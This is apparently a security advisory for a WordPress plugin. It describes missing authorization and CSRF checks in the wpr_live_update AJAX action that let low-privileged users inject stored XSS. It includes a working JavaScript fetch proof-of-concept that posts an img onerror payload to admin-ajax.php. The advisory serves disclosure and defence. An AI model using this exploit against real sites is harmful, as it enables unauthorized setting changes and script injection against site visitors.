The plugin does not have capability and CSRF checks in the wpr_live_update AJAX action, as well as do not sanitise and escape some of the data submitted. As a result, any authenticated, such as subscriber could update the plugin’s settings and perform Cross-Site Scripting attacks against all visitor and users on the frontend
fetch("https://example.com/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"body": "action=wpr_live_update&wprmenu_options[enabled]=1&wprmenu_options[position]=\"><img src onerror=alert(/XSS/)>",
"method": "POST",
})
.then(response => response.text())
.then(function(data) {
console.log(data);
fetch("https://example.com/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"body": "action=wpr_get_transient_from_data",
"method": "POST",
});
});
The XSS will be triggered in all frontend pages